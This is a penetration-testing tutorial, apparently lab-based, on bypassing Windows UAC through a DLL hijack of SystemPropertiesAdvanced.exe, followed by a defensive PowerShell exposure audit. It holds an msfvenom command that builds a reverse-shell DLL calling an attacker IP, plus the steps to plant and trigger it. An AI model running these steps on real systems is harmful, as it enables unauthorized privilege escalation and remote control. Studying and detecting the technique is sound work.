# Bypassing UAC

{% hint style="info" %}
Read more about UAC on the dedicated section in Windows Security.
{% endhint %}

There is no command-line version of the UAC GUI consent prompt, so if we need to bypass UAC from a CLI-only session we have to proceed as follows:

## 0 - Situation

We have shell access to a Windows target, but the session is restricted by UAC, which we must bypass.

## 1 - Check UAC status & level

Confirm UAC is enabled:

```
C:\hacker> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1
```

`0x1` means UAC is enabled, `0x0` means it is disabled.

Check UAC level:

```
C:\htb> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
```

The value ranges from level 1 (`0x1`) to level 5 (`0x5`).

## 2 - Check Windows Build

UAC bypasses rely on flaws or unintended functionality that are specific to particular Windows builds, so the build number determines which bypasses apply.

```
PS C:\hacker> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0
```

Build version 14393, which on [this](https://en.wikipedia.org/wiki/Windows_10_version_history) page corresponds to Windows release `1607`.

## 3 - Find exploit on UACME

The [UACME](https://github.com/hfiref0x/UACME) project maintains a list of UAC bypasses. Older ones that Windows has since fixed are listed in the v3.2.x branch: <https://github.com/hfiref0x/UACME/tree/v3.2.x>

We will use method 54 for this example:

```
54. Author: egre55

    Type: Dll Hijack
    Method: Dll path search abuse
    Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe
    Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll
    Implementation: ucmEgre55Method
    Works from: Windows 10 (14393)
    Fixed in: Windows 10 19H1 (18362)
        How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call
```

{% hint style="info" %}
This technique targets the 32-bit version of the auto-elevating binary `SystemPropertiesAdvanced.exe`. There are many trusted binaries that Windows will allow to auto-elevate without the need for a UAC consent prompt.

According to [this](https://egre55.github.io/system-properties-uac-bypass) blog post, the 32-bit version of `SystemPropertiesAdvanced.exe` attempts to load the non-existent DLL `srrstr.dll`, which belongs to the System Restore functionality.
{% endhint %}

## 4 - Review the PATH

As mentioned in the blog post, `SystemPropertiesAdvanced.exe` will attempt to load a non-existent DLL called `srrstr.dll` from `C:\Users\<USER>\AppData\Local\Microsoft\WindowsApps\`.

Non-privileged users can write to this directory because it is used for installing Microsoft apps.

If this directory is in our PATH (which it should be by default), we can hijack the DLL (see the section on DLL hijacking if needed):

```
PS C:\hacker> cmd /c echo %PATH%

C:\Windows\system32;
C:\Windows;
C:\Windows\System32\Wbem;
C:\Windows\System32\WindowsPowerShell\v1.0\;
C:\Users\hacker\AppData\Local\Microsoft\WindowsApps;
```

## 5 - Generating malicious DLL

Using msfvenom, we generate a DLL that spawns a reverse shell:

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.131 LPORT=5555 -f dll > srrstr.dll
```

And transfer it to the target.

## 6 - Verify the DLL

If we execute the DLL directly, we should catch a shell that is still restricted by UAC:

```
rundll32 shell32.dll,Control_RunDLL C:\Users\hacker\AppData\Local\Microsoft\WindowsApps\srrstr.dll
```

## 7 - Getting unrestricted shell

We can now execute `SystemPropertiesAdvanced.exe`, which will load the DLL and this time send us an unrestricted shell (since `SystemPropertiesAdvanced.exe` auto-elevates):

```
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
```

We should catch a shell, still running as Sarah of course, but no longer restricted by UAC, which we can confirm with:

```
whoami /priv
```

We have significantly more privileges than with a restricted shell.
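To find hosts exposed to this chain from the defender's side, here is an added PowerShell audit (my own code, not from the page or the UACME project) that checks the UAC policy values from step 1, the affected build range from the UACME entry in step 3, and the PATH and directory permissions from step 4, and hunts every profile for an already-planted `srrstr.dll`. The function name `Test-SrrstrExposure` is an assumption.

```powershell
# Added audit script, not from the page or UACME: reports whether a host meets the
# preconditions of the SystemPropertiesAdvanced.exe / srrstr.dll chain and whether a
# DLL of that name is already present in any user's WindowsApps directory.
function Test-SrrstrExposure {
    $policy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p      = Get-ItemProperty -Path $policy -ErrorAction SilentlyContinue
    $build  = [System.Environment]::OSVersion.Version.Build

    # WindowsApps sits under the user's profile, so it is writable without admin rights
    $windowsApps = Join-Path $env:LOCALAPPDATA 'Microsoft\WindowsApps'
    $onPath = ($env:PATH -split ';' | ForEach-Object { $_.TrimEnd('\') }) -contains $windowsApps

    # Probe writability by creating and removing a random empty file (no DLL is written)
    $writable = $false
    try {
        $probe = Join-Path $windowsApps ([System.IO.Path]::GetRandomFileName())
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        $writable = $true
    } catch { }

    # Hunt for the DLL name this technique uses across every profile on the machine
    $planted = @(Get-ChildItem -Path 'C:\Users\*\AppData\Local\Microsoft\WindowsApps\srrstr.dll' `
                               -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName)

    # Build range taken from the UACME entry: works from 14393, fixed in 18362
    $inRange = ($build -ge 14393 -and $build -lt 18362)

    [pscustomobject]@{
        UacEnabled                 = ($p.EnableLUA -eq 1)
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        Build                      = $build
        BuildInAffectedRange       = $inRange
        WindowsAppsOnPath          = $onPath
        WindowsAppsWritable        = $writable
        PlantedSrrstrDll           = $planted
        # Exposed only when every precondition of the chain holds at the same time
        Exposed                    = ($p.EnableLUA -eq 1 -and $inRange -and $onPath -and $writable)
    }
}

Test-SrrstrExposure | Format-List
```

A non-empty `PlantedSrrstrDll` on a host that is not expected to have one is worth an incident ticket regardless of the other fields, since the DLL should not exist on a clean system.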
